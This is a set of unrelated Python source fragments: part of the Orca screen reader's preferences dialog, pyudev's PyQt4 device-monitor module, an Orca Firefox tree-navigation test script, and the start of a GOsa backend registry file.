        else:
            self.prefsDict["brailleRolenameStyle"] = \
                settings.BRAILLE_ROLENAME_STYLE_LONG

    def brailleVerbosityChanged(self, widget):
        """Signal handler for the "toggled" signal for the brailleBriefButton,
           or brailleVerboseButton GtkRadioButton widgets. The user has
           toggled the braille verbosity level value. If this signal was
           generated as the result of a radio button getting selected
           (as opposed to a radio button losing the selection), set the
           'brailleVerbosityLevel' preference to the new value.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.VERBOSITY_LEVEL_BRIEF:
                self.prefsDict["brailleVerbosityLevel"] = \
                    settings.VERBOSITY_LEVEL_BRIEF
            else:
                self.prefsDict["brailleVerbosityLevel"] = \
                    settings.VERBOSITY_LEVEL_VERBOSE

    def keyModifiedToggle(self, cell, path, model, col):
        """When the user changes a checkbox field (boolean field)"""

        model[path][col] = not model[path][col]
        return

    def editingKey(self, cell, editable, path, treeModel):
        """Starts user input of a Key for a selected key binding"""

        self._presentMessage(messages.KB_ENTER_NEW_KEY)
        orca_state.capturingKeys = True
        editable.connect('key-press-event', self.kbKeyPressed)
        return

    def editingCanceledKey(self, editable):
        """Stops user input of a Key for a selected key binding"""

        orca_state.capturingKeys = False
        self._capturedKey = []
        return

    def _processKeyCaptured(self, keyPressedEvent):
        """Called when a new key event arrives and we are capturing keys.
        (used for key bindings redefinition)
        """

        # We want the keyname rather than the printable character.
        # If it's not on the keypad, get the name of the unshifted
        # character. (i.e. "1" instead of "!")
        #
        keycode = keyPressedEvent.hardware_keycode
        keymap = Gdk.Keymap.get_default()
        entries_for_keycode = keymap.get_entries_for_keycode(keycode)
        entries = entries_for_keycode[-1]
        eventString = Gdk.keyval_name(entries[0])
        eventState = keyPressedEvent.state

        orcaMods = settings.orcaModifierKeys
        if eventString in orcaMods:
            self._capturedKey = ['', keybindings.ORCA_MODIFIER_MASK, 0]
            return False

        modifierKeys =  ['Alt_L', 'Alt_R', 'Control_L', 'Control_R',
                         'Shift_L', 'Shift_R', 'Meta_L', 'Meta_R',
                         'Num_Lock', 'Caps_Lock', 'Shift_Lock']
        if eventString in modifierKeys:
            return False

        eventState = eventState & Gtk.accelerator_get_default_mod_mask()
        if not self._capturedKey \
           or eventString in ['Return', 'Escape']:
            self._capturedKey = [eventString, eventState, 1]
            return True

        string, modifiers, clickCount = self._capturedKey
        isOrcaModifier = modifiers & keybindings.ORCA_MODIFIER_MASK
        if isOrcaModifier:
            eventState |= keybindings.ORCA_MODIFIER_MASK
            self._capturedKey = [eventString, eventState, clickCount + 1]

        return True

    def kbKeyPressed(self, editable, event):
        """Special handler for the key_pressed events when editing the
        keybindings.  This lets us control what gets inserted into the
        entry.
        """

        keyProcessed = self._processKeyCaptured(event)
        if not keyProcessed:
            return True

        if not self._capturedKey:
            return False

        keyName, modifiers, clickCount = self._capturedKey
        if not keyName or keyName in ["Return", "Escape"]:
            return False

        isOrcaModifier = modifiers & keybindings.ORCA_MODIFIER_MASK
        if keyName in ["Delete", "BackSpace"] and not isOrcaModifier:
            editable.set_text("")
            self._presentMessage(messages.KB_DELETED)
            self._capturedKey = []
            self.newBinding = None
            return True

        self.newBinding = keybindings.KeyBinding(keyName,
                                                 keybindings.defaultModifierMask,
                                                 modifiers,
                                                 None,
                                                 clickCount)
        modifierNames = keybindings.getModifierNames(modifiers)
        clickCountString = self._clickCountToString(clickCount)
        newString = modifierNames + keyName + clickCountString
        description = self.pendingKeyBindings.get(newString)

        if description is None:
            match = lambda x: x.keysymstring == keyName \
                          and x.modifiers == modifiers \
                          and x.click_count == clickCount \
                          and x.handler
            matches = list(filter(match, self.kbindings.keyBindings))
            if matches:
                description = matches[0].handler.description

        if description:
            msg = messages.KB_ALREADY_BOUND % description
            delay = int(1000 * settings.doubleClickTimeout)
            GLib.timeout_add(delay, self._presentMessage, msg)
        else:
            msg = messages.KB_CAPTURED % newString
            editable.set_text(newString)
            self._presentMessage(msg)

        return True

    def editedKey(self, cell, path, new_text, treeModel,
                  modMask, modUsed, key, click_count, text):
        """The user changed the key for a Keybinding: update the model of
        the treeview.
        """

        orca_state.capturingKeys = False
        self._capturedKey = []
        myiter = treeModel.get_iter_from_string(path)
        try:
            originalBinding = treeModel.get_value(myiter, text)
        except:
            originalBinding = ''
        modified = (originalBinding != new_text)

        try:
            string = self.newBinding.keysymstring
            mods = self.newBinding.modifiers
            clickCount = self.newBinding.click_count
        except:
            string = ''
            mods = 0
            clickCount = 1

        mods = mods & Gdk.ModifierType.MODIFIER_MASK
        if mods & (1 << pyatspi.MODIFIER_SHIFTLOCK) \
           and mods & keybindings.ORCA_MODIFIER_MASK:
            mods ^= (1 << pyatspi.MODIFIER_SHIFTLOCK)

        treeModel.set(myiter,
                      modMask, str(keybindings.defaultModifierMask),
                      modUsed, str(int(mods)),
                      key, string,
                      text, new_text,
                      click_count, str(clickCount),
                      MODIF, modified)
        speech.stop()
        if new_text:
            message = messages.KB_CAPTURED_CONFIRMATION % new_text
            description = treeModel.get_value(myiter, DESCRIP)
            self.pendingKeyBindings[new_text] = description
        else:
            message = messages.KB_DELETED_CONFIRMATION

        if modified:
            self._presentMessage(message)
            self.pendingKeyBindings[originalBinding] = ""

        return

    def presentToolTipsChecked(self, widget):
        """Signal handler for the "toggled" signal for the
           presentToolTipsCheckButton GtkCheckButton widget.
           The user has [un]checked the 'Present ToolTips'
           checkbox. Set the 'presentToolTips'
           preference to the new value if the user can present tooltips.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.prefsDict["presentToolTips"] = widget.get_active()

    def keyboardLayoutChanged(self, widget):
        """Signal handler for the "toggled" signal for the generalDesktopButton,
           or generalLaptopButton GtkRadioButton widgets. The user has
           toggled the keyboard layout value. If this signal was
           generated as the result of a radio button getting selected
           (as opposed to a radio button losing the selection), set the
           'keyboardLayout' preference to the new value. Also set the
           matching list of Orca modifier keys

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            if widget.get_label() == guilabels.KEYBOARD_LAYOUT_DESKTOP:
                self.prefsDict["keyboardLayout"] = \
                    settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP
                self.prefsDict["orcaModifierKeys"] = \
                    settings.DESKTOP_MODIFIER_KEYS
            else:
                self.prefsDict["keyboardLayout"] = \
                    settings.GENERAL_KEYBOARD_LAYOUT_LAPTOP
                self.prefsDict["orcaModifierKeys"] = \
                    settings.LAPTOP_MODIFIER_KEYS

    def pronunciationAddButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        pronunciationAddButton GtkButton widget. The user has clicked
        the Add button on the Pronunciation pane. A new row will be 
        added to the end of the pronunciation dictionary list. Both the
        actual and replacement strings will initially be set to an empty
        string. Focus will be moved to that row.

        Arguments:
        - widget: the component that generated the signal.
        """

        model = self.pronunciationView.get_model()
        thisIter = model.append()
        model.set(thisIter, ACTUAL, "", REPLACEMENT, "")        
        path = model.get_path(thisIter)
        col = self.pronunciationView.get_column(0)
        self.pronunciationView.grab_focus()
        self.pronunciationView.set_cursor(path, col, True) 

    def pronunciationDeleteButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        pronunciationDeleteButton GtkButton widget. The user has clicked
        the Delete button on the Pronunciation pane. The row in the 
        pronunciation dictionary list with focus will be deleted.

        Arguments:
        - widget: the component that generated the signal.
        """

        model, oldIter = self.pronunciationView.get_selection().get_selected()
        model.remove(oldIter)

    def textSelectAllButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textSelectAllButton GtkButton widget. The user has clicked
        the Speak all button.  Check all the text attributes and
        then update the "enabledSpokenTextAttributes" and
        "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        attributes = _settingsManager.getSetting('allTextAttributes')
        self._setSpokenTextAttributes(
            self.getTextAttributesView, attributes, True)
        self._setBrailledTextAttributes(
            self.getTextAttributesView, attributes, True)
        self._updateTextDictEntry()

    def textUnselectAllButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textUnselectAllButton GtkButton widget. The user has clicked
        the Speak none button. Uncheck all the text attributes and
        then update the "enabledSpokenTextAttributes" and
        "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        attributes = _settingsManager.getSetting('allTextAttributes')
        self._setSpokenTextAttributes(
            self.getTextAttributesView, attributes, False)
        self._setBrailledTextAttributes(
            self.getTextAttributesView, attributes, False)
        self._updateTextDictEntry()

    def textResetButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textResetButton GtkButton widget. The user has clicked
        the Reset button. Reset all the text attributes to their
        initial state and then update the "enabledSpokenTextAttributes"
        and "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        attributes = _settingsManager.getSetting('allTextAttributes')
        self._setSpokenTextAttributes(
            self.getTextAttributesView, attributes, False)
        self._setBrailledTextAttributes(
            self.getTextAttributesView, attributes, False)

        attributes = _settingsManager.getSetting('enabledSpokenTextAttributes')
        self._setSpokenTextAttributes(
            self.getTextAttributesView, attributes, True)

        attributes = \
            _settingsManager.getSetting('enabledBrailledTextAttributes')
        self._setBrailledTextAttributes(
            self.getTextAttributesView, attributes, True)

        self._updateTextDictEntry()

    def textMoveToTopButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveToTopButton GtkButton widget. The user has clicked
        the Move to top button. Move the selected rows in the text
        attribute view to the very top of the list and then update
        the "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        textSelection = self.getTextAttributesView.get_selection()
        [model, paths] = textSelection.get_selected_rows()
        for path in paths:
            thisIter = model.get_iter(path)
            model.move_after(thisIter, None)
        self._updateTextDictEntry()

    def textMoveUpOneButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveUpOneButton GtkButton widget. The user has clicked
        the Move up one button. Move the selected rows in the text
        attribute view up one row in the list and then update the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        textSelection = self.getTextAttributesView.get_selection()
        [model, paths] = textSelection.get_selected_rows()
        for path in paths:
            thisIter = model.get_iter(path)
            indices = path.get_indices()
            if indices[0]:
                otherIter = model.iter_nth_child(None, indices[0]-1)
                model.swap(thisIter, otherIter)
        self._updateTextDictEntry()

    def textMoveDownOneButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveDownOneButton GtkButton widget. The user has clicked
        the Move down one button. Move the selected rows in the text
        attribute view down one row in the list and then update the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        textSelection = self.getTextAttributesView.get_selection()
        [model, paths] = textSelection.get_selected_rows()
        noRows = model.iter_n_children(None)
        for path in paths:
            thisIter = model.get_iter(path)
            indices = path.get_indices()
            if indices[0] < noRows-1:
                otherIter = model.iter_next(thisIter)
                model.swap(thisIter, otherIter)
        self._updateTextDictEntry()

    def textMoveToBottomButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveToBottomButton GtkButton widget. The user has clicked
        the Move to bottom button. Move the selected rows in the text
        attribute view to the bottom of the list and then update the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        textSelection = self.getTextAttributesView.get_selection()
        [model, paths] = textSelection.get_selected_rows()
        for path in paths:
            thisIter = model.get_iter(path)
            model.move_before(thisIter, None)
        self._updateTextDictEntry()

    def helpButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the helpButton
           GtkButton widget. The user has clicked the Help button.

        Arguments:
        - widget: the component that generated the signal.
        """

        orca.helpForOrca(page="preferences")

    def restoreSettings(self):
        """Restore the settings we saved away when opening the preferences
           dialog."""
        # Restore the default rate/pitch/gain,
        # in case the user played with the sliders.
        #
        voices = _settingsManager.getSetting('voices')
        defaultVoice = voices[settings.DEFAULT_VOICE]
        defaultVoice[acss.ACSS.GAIN] = self.savedGain
        defaultVoice[acss.ACSS.AVERAGE_PITCH] = self.savedPitch
        defaultVoice[acss.ACSS.RATE] =  self.savedRate

    def saveBasicSettings(self):
        if not self._isInitialSetup:
            self.restoreSettings()

        enable = self.get_widget("speechSupportCheckButton").get_active()
        self.prefsDict["enableSpeech"] = enable

        if self.speechSystemsChoice:
            self.prefsDict["speechServerFactory"] = \
                self.speechSystemsChoice.__name__

        if self.speechServersChoice:
            self.prefsDict["speechServerInfo"] = \
                self.speechServersChoice.getInfo()

        if self.defaultVoice is not None:
            self.prefsDict["voices"] = {
                settings.DEFAULT_VOICE: acss.ACSS(self.defaultVoice),
                settings.UPPERCASE_VOICE: acss.ACSS(self.uppercaseVoice),
                settings.HYPERLINK_VOICE: acss.ACSS(self.hyperlinkVoice),
                settings.SYSTEM_VOICE: acss.ACSS(self.systemVoice),
            }

    def applyButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the applyButton
           GtkButton widget. The user has clicked the Apply button.
           Write out the users preferences. If GNOME accessibility hadn't
           previously been enabled, warn the user that they will need to
           log out. Shut down any active speech servers that were started.
           Reload the users preferences to get the new speech, braille and
           key echo value to take effect. Do not dismiss the configuration
           window.

        Arguments:
        - widget: the component that generated the signal.
        """
        self.saveBasicSettings()

        activeProfile = self.getComboBoxList(self.profilesCombo)
        startingProfile = self.getComboBoxList(self.startingProfileCombo)

        self.prefsDict['profile'] = activeProfile
        self.prefsDict['activeProfile'] = activeProfile
        self.prefsDict['startingProfile'] = startingProfile
        _settingsManager.setStartingProfile(startingProfile)

        self.writeUserPreferences()

        orca.loadUserSettings(self.script)

        braille.checkBrailleSetting()

        self._initSpeechState()

        self._populateKeyBindings()

        self.__initProfileCombo()

    def cancelButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the cancelButton
           GtkButton widget. The user has clicked the Cancel button.
           Don't write out the preferences. Destroy the configuration window.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.windowClosed(widget)
        self.get_widget("orcaSetupWindow").destroy()

    def okButtonClicked(self, widget=None):
        """Signal handler for the "clicked" signal for the okButton
           GtkButton widget. The user has clicked the OK button.
           Write out the users preferences. If GNOME accessibility hadn't
           previously been enabled, warn the user that they will need to
           log out. Shut down any active speech servers that were started.
           Reload the users preferences to get the new speech, braille and
           key echo value to take effect. Hide the configuration window.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.applyButtonClicked(widget)
        self._cleanupSpeechServers()
        self.get_widget("orcaSetupWindow").destroy()

    def windowClosed(self, widget):
        """Signal handler for the "closed" signal for the orcaSetupWindow
           GtkWindow widget. This is effectively the same as pressing the
           cancel button, except the window is destroyed for us.

        Arguments:
        - widget: the component that generated the signal.
        """

        factory = _settingsManager.getSetting('speechServerFactory')
        if factory:
            self._setSpeechSystemsChoice(factory)

        server = _settingsManager.getSetting('speechServerInfo')
        if server:
            self._setSpeechServersChoice(server)

        self._cleanupSpeechServers()
        self.restoreSettings()

    def windowDestroyed(self, widget):
        """Signal handler for the "destroyed" signal for the orcaSetupWindow
           GtkWindow widget. Reset orca_state.orcaOS to None, so that the 
           GUI can be rebuilt from the GtkBuilder file the next time the user
           wants to display the configuration GUI.

        Arguments:
        - widget: the component that generated the signal.
        """

        self.keyBindView.set_model(None)
        self.getTextAttributesView.set_model(None)
        self.pronunciationView.set_model(None)
        self.keyBindView.set_headers_visible(False)
        self.getTextAttributesView.set_headers_visible(False)
        self.pronunciationView.set_headers_visible(False)
        self.keyBindView.hide()
        self.getTextAttributesView.hide()
        self.pronunciationView.hide()
        orca_state.orcaOS = None

    def showProfileGUI(self, widget):
        """Show profile Dialog to add a new one"""

        orca_gui_profile.showProfileUI(self)

    def saveProfile(self, profileToSaveLabel):
        """Creates a new profile based on the name profileToSaveLabel and
        updates the Preferences dialog combo boxes accordingly."""

        if not profileToSaveLabel:
            return
        profileToSave = profileToSaveLabel.replace(' ', '_').lower()
        profile = [profileToSaveLabel, profileToSave]

        def saveActiveProfile(newProfile = True):
            if newProfile:
                activeProfileIter = self.profilesComboModel.append(profile)
                self.profilesCombo.set_active_iter(activeProfileIter)

            self.prefsDict['profile'] = profile
            self.prefsDict['activeProfile'] = profile
            self.saveBasicSettings()
            self.writeUserPreferences()

        availableProfiles = [p[1] for p in self.__getAvailableProfiles()]
        if isinstance(profileToSave, str) \
                and profileToSave != '' \
                and not profileToSave in availableProfiles \
                and profileToSave != self._defaultProfile[1]:
            saveActiveProfile()
        else:
            if profileToSave is not None:
                message = guilabels.PROFILE_CONFLICT_MESSAGE % \
                    ("<b>%s</b>" % GLib.markup_escape_text(profileToSaveLabel))
                dialog = Gtk.MessageDialog(None,
                        Gtk.DialogFlags.MODAL,
                        type=Gtk.MessageType.INFO,
                        buttons=Gtk.ButtonsType.YES_NO)
                dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_CONFLICT_LABEL)
                dialog.format_secondary_markup(message)
                dialog.set_title(guilabels.PROFILE_CONFLICT_TITLE)
                response = dialog.run()
                if response == Gtk.ResponseType.YES:
                    dialog.destroy()
                    saveActiveProfile(False)
                else:
                    dialog.destroy()
                

    def removeProfileButtonClicked(self, widget):
        """Remove profile button clicked handler

        If we removed the last profile, a default one will automatically get
        added back by the settings manager.
        """

        oldProfile = self.getComboBoxList(self.profilesCombo)

        message = guilabels.PROFILE_REMOVE_MESSAGE % \
            ("<b>%s</b>" % GLib.markup_escape_text(oldProfile[0]))
        dialog = Gtk.MessageDialog(self.window, Gtk.DialogFlags.MODAL,
                                   type=Gtk.MessageType.INFO,
                                   buttons=Gtk.ButtonsType.YES_NO)
        dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_REMOVE_LABEL)
        dialog.format_secondary_markup(message)
        if dialog.run() == Gtk.ResponseType.YES:
            # If we remove the currently used starting profile, fallback on
            # the first listed profile, or the default one if there's
            # nothing better
            newStartingProfile = self.prefsDict.get('startingProfile')
            if not newStartingProfile or newStartingProfile == oldProfile:
                newStartingProfile = self._defaultProfile
                for row in self.profilesComboModel:
                    rowProfile = row[:]
                    if rowProfile != oldProfile:
                        newStartingProfile = rowProfile
                        break
            # Update the current profile to the active profile unless we're
            # removing that one, in which case we use the new starting
            # profile
            newProfile = self.prefsDict.get('activeProfile')
            if not newProfile or newProfile == oldProfile:
                newProfile = newStartingProfile

            _settingsManager.removeProfile(oldProfile[1])
            self.loadProfile(newProfile)

            # Make sure nothing is referencing the removed profile anymore
            startingProfile = self.prefsDict.get('startingProfile')
            if not startingProfile or startingProfile == oldProfile:
                self.prefsDict['startingProfile'] = newStartingProfile
                _settingsManager.setStartingProfile(newStartingProfile)
                self.writeUserPreferences()

        dialog.destroy()

    def loadProfileButtonClicked(self, widget):
        """Load profile button clicked handler"""

        if self._isInitialSetup:
            return

        dialog = Gtk.MessageDialog(None,
                Gtk.DialogFlags.MODAL,
                type=Gtk.MessageType.INFO,
                buttons=Gtk.ButtonsType.YES_NO)

        dialog.set_markup("<b>%s</b>" % guilabels.PROFILE_LOAD_LABEL)
        dialog.format_secondary_markup(guilabels.PROFILE_LOAD_MESSAGE)
        response = dialog.run()
        if response == Gtk.ResponseType.YES:
            dialog.destroy()
            self.loadSelectedProfile()
        else:
            dialog.destroy()

    def loadSelectedProfile(self):
        """Load selected profile"""

        activeProfile = self.getComboBoxList(self.profilesCombo)
        self.loadProfile(activeProfile)

    def loadProfile(self, profile):
        """Load profile"""

        self.saveBasicSettings()

        self.prefsDict['activeProfile'] = profile
        _settingsManager.setProfile(profile[1])
        self.prefsDict = _settingsManager.getGeneralSettings(profile[1])

        orca.loadUserSettings(skipReloadMessage=True)

        self._initGUIState()

        braille.checkBrailleSetting()

        self._initSpeechState()

        self._populateKeyBindings()

        self.__initProfileCombo()


# -*- coding: utf-8 -*-
# Copyright (C) 2010, 2011, 2012, 2013 Sebastian Wiesner <lunaryorn@gmail.com>

# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.

# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.  See the GNU Lesser General Public License
# for more details.

# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

# pylint: disable=anomalous-backslash-in-string

"""
    pyudev.pyqt4
    ============

    PyQt4 integration.

    :class:`MonitorObserver` integrates device monitoring into the PyQt4\_
    mainloop by turning device events into Qt signals.

    :mod:`PyQt4.QtCore` from PyQt4\_ must be available when importing this
    module.

    .. _PyQt4: http://riverbankcomputing.co.uk/software/pyqt/intro

    .. moduleauthor::  Sebastian Wiesner  <lunaryorn@gmail.com>
"""


from __future__ import (print_function, division, unicode_literals,
                        absolute_import)

from PyQt4.QtCore import QSocketNotifier, QObject, pyqtSignal

from pyudev._util import text_type
from pyudev.core import Device
from pyudev._qt_base import QUDevMonitorObserverMixin, MonitorObserverMixin


class MonitorObserver(QObject, MonitorObserverMixin):
    """An observer for device events integrating into the :mod:`PyQt4` mainloop.

    This class inherits :class:`~PyQt4.QtCore.QObject` to turn device events
    into Qt signals:

    >>> from pyudev import Context, Monitor
    >>> from pyudev.pyqt4 import MonitorObserver
    >>> context = Context()
    >>> monitor = Monitor.from_netlink(context)
    >>> monitor.filter_by(subsystem='input')
    >>> observer = MonitorObserver(monitor)
    >>> def device_event(device):
    ...     print('event {0} on device {1}'.format(device.action, device))
    >>> observer.deviceEvent.connect(device_event)
    >>> monitor.start()

    This class is a child of :class:`~PyQt4.QtCore.QObject`.

    """

    #: emitted upon arbitrary device events
    deviceEvent = pyqtSignal(Device)

    def __init__(self, monitor, parent=None):
        """
        Observe the given ``monitor`` (a :class:`~pyudev.Monitor`):

        ``parent`` is the parent :class:`~PyQt4.QtCore.QObject` of this
        object.  It is passed unchanged to the inherited constructor of
        :class:`~PyQt4.QtCore.QObject`.
        """
        QObject.__init__(self, parent)
        self._setup_notifier(monitor, QSocketNotifier)


class QUDevMonitorObserver(QObject, QUDevMonitorObserverMixin):
    """An observer for device events integrating into the :mod:`PyQt4` mainloop.

    .. deprecated:: 0.17
       Will be removed in 1.0.  Use :class:`MonitorObserver` instead.

    """

    #: emitted upon arbitrary device events
    deviceEvent = pyqtSignal(text_type, Device)
    #: emitted, if a device was added
    deviceAdded = pyqtSignal(Device)
    #: emitted, if a device was removed
    deviceRemoved = pyqtSignal(Device)
    #: emitted, if a device was changed
    deviceChanged = pyqtSignal(Device)
    #: emitted, if a device was moved
    deviceMoved = pyqtSignal(Device)

    def __init__(self, monitor, parent=None):
        """
        Observe the given ``monitor`` (a :class:`~pyudev.Monitor`):

        ``parent`` is the parent :class:`~PyQt4.QtCore.QObject` of this
        object.  It is passed unchanged to the inherited constructor of
        :class:`~PyQt4.QtCore.QObject`.
        """
        QObject.__init__(self, parent)
        self._setup_notifier(monitor, QSocketNotifier)

#!/usr/bin/python

"""Test of tree output using Firefox."""

from macaroon.playback import *
import utils

sequence = MacroSequence()

sequence.append(PauseAction(3000))
sequence.append(KeyComboAction("<Alt>b"))
sequence.append(KeyComboAction("Return"))
sequence.append(KeyComboAction("Tab"))
sequence.append(KeyComboAction("Tab"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Up"))
sequence.append(KeyComboAction("Tab"))
sequence.append(PauseAction(3000))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>Tab"))
sequence.append(utils.AssertPresentationAction(
    "1. Shift Tab for tree",
    ["BRAILLE LINE:  'Firefox application Library frame All Bookmarks expanded TREE LEVEL 1'",
     "     VISIBLE:  'All Bookmarks expanded TREE LEVE', cursor=1",
     "SPEECH OUTPUT: 'All Bookmarks.'",
     "SPEECH OUTPUT: 'expanded.'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "2. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Toolbar TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Toolbar TREE LEVEL 2', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar.'",
     "SPEECH OUTPUT: 'tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "3. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu.'",
     "SPEECH OUTPUT: 'collapsed.'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "4. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu tree item.'",
     "SPEECH OUTPUT: '2 of 3.'",
     "SPEECH OUTPUT: 'collapsed tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
    "5. Right Arrow to expand folder", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'expanded'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "6. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu tree item.'",
     "SPEECH OUTPUT: '2 of 3.'",
     "SPEECH OUTPUT: 'expanded tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
    "7. Down Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame GNOME TREE LEVEL 3'",
     "     VISIBLE:  'GNOME TREE LEVEL 3', cursor=1",
     "SPEECH OUTPUT: 'GNOME.'",
     "SPEECH OUTPUT: 'tree level 3'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
    "8. Basic Where Am I", 
    ["BRAILLE LINE:  'Firefox application Library frame GNOME TREE LEVEL 3'",
     "     VISIBLE:  'GNOME TREE LEVEL 3', cursor=1",
     "SPEECH OUTPUT: 'GNOME tree item.'",
     "SPEECH OUTPUT: '1 of 2.'",
     "SPEECH OUTPUT: 'tree level 3'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "9. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu expanded TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu expanded TREE LEV', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Menu.'",
     "SPEECH OUTPUT: 'expanded.'",
     "SPEECH OUTPUT: 'tree level 2'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
    "10. Left Arrow to collapse folder", 
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Menu collapsed TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Menu collapsed TREE LE', cursor=1",
     "SPEECH OUTPUT: 'collapsed'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "11. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame Bookmarks Toolbar TREE LEVEL 2'",
     "     VISIBLE:  'Bookmarks Toolbar TREE LEVEL 2', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar.'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Up"))
sequence.append(utils.AssertPresentationAction(
    "12. Up Arrow in tree",
    ["BRAILLE LINE:  'Firefox application Library frame All Bookmarks expanded TREE LEVEL 1'",
     "     VISIBLE:  'All Bookmarks expanded TREE LEVE', cursor=1",
     "SPEECH OUTPUT: 'All Bookmarks.'",
     "SPEECH OUTPUT: 'expanded.'",
     "SPEECH OUTPUT: 'tree level 1'"]))

sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
    "13. Tab back to tree table",
    ["BRAILLE LINE:  'Firefox application Library frame tree table Bookmarks Toolbar   table row TREE LEVEL 1'",
     "     VISIBLE:  'Bookmarks Toolbar   table row TR', cursor=1",
     "SPEECH OUTPUT: 'Bookmarks Toolbar  '"]))

sequence.append(KeyComboAction("<Alt>F4"))

sequence.append(utils.AssertionSummaryAction())
sequence.start()

# This file is part of the GOsa framework.
#
#  http://gosa-project.org
#
# Copyright:
#  (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.

import pkg_resources

from gosa.common.components import PluginRegistry
from gosa.common.utils import N_
from gosa.common.error import GosaErrorHandler as C


# Register the errors handled  by us
C.register_codes(dict(
    BACKEND_NOT_FOUND=N_("Backend '%(topic)s' not found"),
    ))


class ObjectBackendRegistry(object):
    instance = None
    backends = {}
